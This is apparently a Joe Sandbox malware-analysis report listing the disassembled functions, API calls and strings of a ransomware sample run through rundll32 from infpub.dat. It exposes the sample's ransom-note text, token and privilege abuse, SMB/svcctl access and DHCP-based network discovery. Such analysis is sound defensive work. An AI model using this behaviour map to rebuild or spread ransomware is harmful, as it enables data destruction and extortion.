Part of subcall function 004750A2: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76F2D354), ref: 00475148
Part of subcall function 004750A2: HeapFree.KERNEL32(00000000), ref: 0047514F
Part of subcall function 004750A2: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,76F2D354,?,?,?,004752FD,?), ref: 00475158
Part of subcall function 004750A2: HeapFree.KERNEL32(00000000), ref: 0047515F

GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 00475308
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0047943A), ref: 00475316
HeapFree.KERNEL32(00000000), ref: 00475319
GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 00475324
HeapFree.KERNEL32(00000000), ref: 00475327

Strings

rundll32 %s,#2 %s, xrefs: 004752A5
svcctl, xrefs: 00475199
IPC$, xrefs: 00475175
clr_optimization_v%d.%d.%d, xrefs: 0047523E

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004785FB, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147

APIs

memset.MSVCRT ref: 0047862D

Part of subcall function 00478147: memset.MSVCRT ref: 00478160
Part of subcall function 00478147: GetVersionExW.KERNEL32(?,?,?,757DDE72), ref: 00478179

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00478645
Process32FirstW.KERNEL32 ref: 00478666
OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 004786A0
OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 004786B9
GetTokenInformation.ADVAPI32(000000FF,0000000C,?,00000004,?), ref: 004786DF
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 00478708
memset.MSVCRT ref: 0047871E
GetTokenInformation.ADVAPI32(?,0000000A,?,00000038,?,?,00000000,?), ref: 00478738
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 00478767
CloseHandle.KERNEL32(?), ref: 004787A2
CloseHandle.KERNEL32(?), ref: 004787A8
Process32NextW.KERNEL32(?,?), ref: 004787BA
GetLastError.KERNEL32 ref: 004787CA
CloseHandle.KERNEL32(?), ref: 004787D4

Strings

@, xrefs: 004787AA

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004741E9, Relevance: 25.9, APIs: 13, Strings: 4, Instructions: 443

APIs

GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,757DFE8D), ref: 004741FD
HeapAlloc.KERNEL32(00000000), ref: 00474204

Part of subcall function 004740E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 004740F8
Part of subcall function 004740E3: HeapAlloc.KERNEL32(00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 004740FB
Part of subcall function 004740E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 00474148
Part of subcall function 004740E3: HeapAlloc.KERNEL32(00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 0047414B
Part of subcall function 004740E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0047423D,?,?,?,?,00000000), ref: 00474184
Part of subcall function 004740E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,=BG,?,?,?,0047423D,?,?,?,?,00000000), ref: 004741BC
Part of subcall function 004740E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0047423D,?,?,?,?), ref: 004741CB
Part of subcall function 004740E3: HeapFree.KERNEL32(00000000), ref: 004741CE
Part of subcall function 004740E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 004741D7
Part of subcall function 004740E3: HeapFree.KERNEL32(00000000), ref: 004741DA

Part of subcall function 00473D0D: Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 00473FF8
Part of subcall function 00473D0D: Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 00474063
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,?), ref: 0047406E
Part of subcall function 00473D0D: HeapAlloc.KERNEL32(00000000), ref: 00474075
Part of subcall function 00473D0D: memcpy.MSVCRT ref: 0047408F

GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 00474287
HeapFree.KERNEL32(00000000), ref: 0047428E
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 004742D9
HeapFree.KERNEL32(00000000), ref: 004742E0
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 00474336
HeapFree.KERNEL32(00000000), ref: 0047433D
GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,757DFE8D,?,00000000,00000100,?), ref: 00474399
HeapFree.KERNEL32(00000000), ref: 004743A0
memset.MSVCRT ref: 004743AE
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 0047466C
HeapFree.KERNEL32(00000000), ref: 00474673

Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,757DFE8D,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?), ref: 00473D2B
Part of subcall function 00473D0D: HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473D34
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 00473D46
Part of subcall function 00473D0D: HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473D49
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 00473D63
Part of subcall function 00473D0D: HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473D66
Part of subcall function 00473D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,00474269,?,00000000,?,?,?), ref: 00473E5B
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 00473E65
Part of subcall function 00473D0D: HeapAlloc.KERNEL32(00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 00473E68
Part of subcall function 00473D0D: rand.MSVCRT ref: 00473EC3
Part of subcall function 00473D0D: memset.MSVCRT ref: 00473EFC
Part of subcall function 00473D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 00473F38
Part of subcall function 00473D0D: htons.WS2_32(?), ref: 00473F5C
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,00474269,?,00000000,?,?), ref: 004740A0
Part of subcall function 00473D0D: HeapFree.KERNEL32(00000000), ref: 004740A7
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,00474269,?,00000000,?,?), ref: 004740B6
Part of subcall function 00473D0D: HeapFree.KERNEL32(00000000), ref: 004740B9
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 004740C2
Part of subcall function 00473D0D: HeapFree.KERNEL32(00000000), ref: 004740C5
Part of subcall function 00473D0D: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 004740D0
Part of subcall function 00473D0D: HeapFree.KERNEL32(00000000), ref: 004740D3

Strings

6H, xrefs: 00474427
6H, xrefs: 00474480
6H, xrefs: 004745A7
6H, xrefs: 0047453C

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004760F9, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 113

APIs

wsprintfW.USER32 ref: 00476118
PathCombineW.SHLWAPI(?,?,?), ref: 00476136

Part of subcall function 00476477: GetTickCount.KERNEL32(00477DDC,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00476477

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00476170
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 00476191

Part of subcall function 004757E5: LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 00475805
Part of subcall function 004757E5: GetSystemDefaultLCID.KERNEL32 ref: 0047581D
Part of subcall function 004757E5: GetTimeZoneInformation.KERNEL32(?), ref: 0047582D
Part of subcall function 004757E5: memcpy.MSVCRT ref: 0047584B
Part of subcall function 004757E5: NetWkstaGetInfo.NETAPI32(00480494,00000064,?), ref: 00475861
Part of subcall function 004757E5: memcpy.MSVCRT ref: 004758C7
Part of subcall function 004757E5: memcpy.MSVCRT ref: 004758EA
Part of subcall function 004757E5: NetApiBufferFree.NETAPI32(?,?,?,?), ref: 004758F3
Part of subcall function 004757E5: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 00475924
Part of subcall function 004757E5: memcpy.MSVCRT ref: 00475943
Part of subcall function 004757E5: LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 0047598C
Part of subcall function 004757E5: LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 004759A2

memset.MSVCRT ref: 004761C8
StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 004761E2
StrCatW.SHLWAPI(?,?), ref: 004761EE
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0047621B
FlushFileBuffers.KERNEL32(00000000), ref: 00476226
LocalFree.KERNEL32(?), ref: 0047622F
CloseHandle.KERNEL32(00000000), ref: 00476236

Strings

Readme.txt, xrefs: 00476107
Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 004761D6

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00473071, Relevance: 21.1, APIs: 14, Instructions: 95

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,757DFE8D,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 00473089
HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473092
GetProcessHeap.KERNEL32(00000008,0000003F,757DC570,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A4
HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 004730A7
htons.WS2_32(0000003B), ref: 004730BF
send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 004730F7
recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0047310D
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473127
HeapAlloc.KERNEL32(00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0047312E
memcpy.MSVCRT ref: 00473144
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473153
HeapFree.KERNEL32(00000000), ref: 0047315A
GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,00474F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 00473165
HeapFree.KERNEL32(00000000), ref: 0047316C

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047892A, Relevance: 19.6, APIs: 13, Instructions: 91

APIs

GetCurrentThread.KERNEL32(00020008,00000001,?), ref: 00478944
OpenThreadToken.ADVAPI32(00000000), ref: 0047894B
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0047896D
GetLastError.KERNEL32 ref: 0047897E
GlobalAlloc.KERNEL32(00000040,?), ref: 0047898F
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 004789A8
GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 004789BF
GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 004789D2
GetLastError.KERNEL32 ref: 004789FD
GlobalFree.KERNEL32(00000000), ref: 00478A00
GetLastError.KERNEL32 ref: 00478A08
CloseHandle.KERNEL32(?), ref: 00478A0F
GetLastError.KERNEL32 ref: 00478A17

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00472F5A, Relevance: 18.1, APIs: 12, Instructions: 98

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 00472F73
HeapAlloc.KERNEL32(00000000), ref: 00472F7C
GetProcessHeap.KERNEL32(00000008,?,76F1C070), ref: 00472F97
HeapAlloc.KERNEL32(00000000), ref: 00472F9A
htons.WS2_32(424D53FE), ref: 00472FBA
memcpy.MSVCRT ref: 0047300B
send.WS2_32(?,00000000,?,00000000), ref: 0047301B
recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473032
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00473048
HeapFree.KERNEL32(00000000), ref: 0047304F
GetProcessHeap.KERNEL32(00000008,?), ref: 0047305A
HeapFree.KERNEL32(00000000), ref: 00473061

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004732AF, Relevance: 18.1, APIs: 12, Instructions: 88

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 004732CB
HeapAlloc.KERNEL32(00000000), ref: 004732D4
GetProcessHeap.KERNEL32(00000008,?,757DFE8D), ref: 004732EF
HeapAlloc.KERNEL32(00000000), ref: 004732F2
htons.WS2_32(?), ref: 0047330F
memcpy.MSVCRT ref: 0047333D
send.WS2_32(?,00000000,?,00000000), ref: 00473350
recv.WS2_32(?,?,0000FFFF,00000000), ref: 00473368
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047337B
HeapFree.KERNEL32(00000000), ref: 00473382
GetProcessHeap.KERNEL32(00000008,?), ref: 0047338D
HeapFree.KERNEL32(00000000), ref: 00473394

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477BF7, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 69

APIs

GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00477C0E
lstrcatW.KERNEL32(?,\rundll32.exe), ref: 00477C28
GetModuleFileNameW.KERNEL32(C:\Windows\infpub.dat,0000030C), ref: 00477C43
PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 00477C51
wsprintfW.USER32 ref: 00477C6B
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00477CB3
ExitProcess.KERNEL32 ref: 00477CBA

Strings

\rundll32.exe, xrefs: 00477C1C
C:\Windows\infpub.dat, xrefs: 00477C37, 00477C3C, 00477C50
%ws C:\Windows\%ws,#1 %ws, xrefs: 00477C65

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478D39, Relevance: 16.6, APIs: 11, Instructions: 130

APIs

GetComputerNameExW.KERNEL32(00000004,?,?,00000000,73349263,00000000), ref: 00478D80
DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 00478DA2
DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 00478DCE
DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 00478E07
htonl.WS2_32(00000000), ref: 00478E36
htonl.WS2_32(00000000), ref: 00478E44
inet_ntoa.WS2_32(00000000), ref: 00478E47

Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,774E2D57,?,757DC426), ref: 00476439
Part of subcall function 0047641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00476446
Part of subcall function 0047641A: HeapAlloc.KERNEL32(00000000), ref: 0047644D
Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 00476465

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00478E65
HeapFree.KERNEL32(00000000), ref: 00478E6C
DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 00478E81
DhcpRpcFreeMemory.DHCPSAPI(?), ref: 00478E9A

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00472E12, Relevance: 16.6, APIs: 11, Instructions: 109

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 00472E32
HeapAlloc.KERNEL32(00000000), ref: 00472E3B
GetProcessHeap.KERNEL32(00000008,00000048,757DFE8D), ref: 00472E4D
HeapAlloc.KERNEL32(00000000), ref: 00472E50
htons.WS2_32(00000044), ref: 00472E68
send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 00472EF3
recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 00472F0B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00472F31
HeapFree.KERNEL32(00000000), ref: 00472F38
GetProcessHeap.KERNEL32(00000008,?), ref: 00472F43
HeapFree.KERNEL32(00000000), ref: 00472F4A

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004740E3, Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 91

APIs

GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 004740F8
HeapAlloc.KERNEL32(00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 004740FB
GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 00474148
HeapAlloc.KERNEL32(00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 0047414B
HeapFree.KERNEL32(00000000), ref: 004741DA

Part of subcall function 00473209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E), ref: 00473220
Part of subcall function 00473209: HeapAlloc.KERNEL32(00000000,?,00473BAA,?,?,?,00000000,00000000,?,?,?,00474A6E,?,?,?,?), ref: 00473227
Part of subcall function 00473209: htons.WS2_32(?), ref: 00473246
Part of subcall function 00473209: memcpy.MSVCRT ref: 00473276
Part of subcall function 00473209: send.WS2_32(?,00000000,?,00000000), ref: 00473287
Part of subcall function 00473209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0047329A
Part of subcall function 00473209: HeapFree.KERNEL32(00000000), ref: 004732A1

Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0047423D,?,?,?,?,00000000), ref: 00474184
Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,=BG,?,?,?,0047423D,?,?,?,?,00000000), ref: 004741BC
GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0047423D,?,?,?,?), ref: 004741CB
HeapFree.KERNEL32(00000000), ref: 004741CE
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0047423D,?,?,?,?,00000000,00000002), ref: 004741D7

Strings

=BG, xrefs: 0047418A, 0047419E

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478832, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62

APIs

CreateFileW.KERNEL32(C:\Windows\infpub.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0047884F
GetFileSize.KERNEL32(00000000,00000000), ref: 00478860
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0047886F
HeapAlloc.KERNEL32(00000000), ref: 00478876
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0047888F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004788A0
HeapFree.KERNEL32(00000000), ref: 004788A7
CloseHandle.KERNEL32(?), ref: 004788C6

Strings

C:\Windows\infpub.dat, xrefs: 00478847

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477897, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 48

APIs

GetTickCount.KERNEL32(?,?,?,004779E8), ref: 004778AF
srand.MSVCRT ref: 004778B2
GetTickCount.KERNEL32(?,?,004779E8), ref: 004778B9

Part of subcall function 00477CC5: GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,004779E8), ref: 00477CE9
Part of subcall function 00477CC5: OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,004779E8), ref: 00477CF0
Part of subcall function 00477CC5: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00477D02
Part of subcall function 00477CC5: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00477D25
Part of subcall function 00477CC5: GetLastError.KERNEL32(?,00000000), ref: 00477D2D
Part of subcall function 00477CC5: SetLastError.KERNEL32(?,?,00000000,?,?,?,004779E8), ref: 00477D3F

Part of subcall function 0047855F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00478571
Part of subcall function 0047855F: Process32FirstW.KERNEL32(00000000,?), ref: 0047858F
Part of subcall function 0047855F: Process32NextW.KERNEL32(00000000,0000022C), ref: 004785E4
Part of subcall function 0047855F: CloseHandle.KERNEL32(00000000), ref: 004785EF

Part of subcall function 0047554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 00475561
Part of subcall function 0047554A: GetLastError.KERNEL32(?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 0047556B
Part of subcall function 0047554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 00475581
Part of subcall function 0047554A: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0047790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 0047558E

GetModuleFileNameW.KERNEL32(C:\Windows\infpub.dat,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,004779E8), ref: 00477926

Part of subcall function 00478832: CreateFileW.KERNEL32(C:\Windows\infpub.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0047884F
Part of subcall function 00478832: GetFileSize.KERNEL32(00000000,00000000), ref: 00478860
Part of subcall function 00478832: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0047886F
Part of subcall function 00478832: HeapAlloc.KERNEL32(00000000), ref: 00478876
Part of subcall function 00478832: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0047888F
Part of subcall function 00478832: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004788A0
Part of subcall function 00478832: HeapFree.KERNEL32(00000000), ref: 004788A7
Part of subcall function 00478832: CloseHandle.KERNEL32(?), ref: 004788C6

Strings

SeShutdownPrivilege, xrefs: 004778BB
SeTcbPrivilege, xrefs: 004778E2
C:\Windows\infpub.dat, xrefs: 00477916
SeDebugPrivilege, xrefs: 004778D1

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476E66, Relevance: 13.8, APIs: 11, Instructions: 95

APIs

EnterCriticalSection.KERNEL32(?,002F16E0,757DC570,757DFE8D,?,?,00476A84,002F16E0,?,?), ref: 00476E87

Part of subcall function 00476DA4: EnterCriticalSection.KERNEL32(?,00000000,002F16E0,?,?,00476E98,002F16E0,00000000,?,?,00476A84,002F16E0,?), ref: 00476DB5
